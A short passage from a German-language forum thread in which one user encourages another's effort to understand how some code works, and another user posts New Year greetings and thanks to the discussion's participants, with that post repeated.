Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.
Trapper Tom
2
Hallo zusammen,
an dieser Stelle wünsche ich allen ein frohes neues und erfolgreiches Jahr.
Nicht immer aber hoffentlich bin ich nicht der einzige Poster, der sich bei allen beteiligten dieser Diskussion mit produktiven und weniger produktiven Kommentaren bedanken möchte.
Vielen herzlichen Dank, Euch allen.
Mit besten Grüßen
Zeppelin
an dieser Stelle wünsche ich allen ein frohes neues und erfolgreiches Jahr.
Nicht immer aber hoffentlich bin ich nicht der einzige Poster, der sich bei allen beteiligten dieser Diskussion mit produktiven und weniger produktiven Kommentaren bedanken möchte.
Vielen herzlichen Dank, Euch allen.
Mit besten Grüßen
Zeppelin
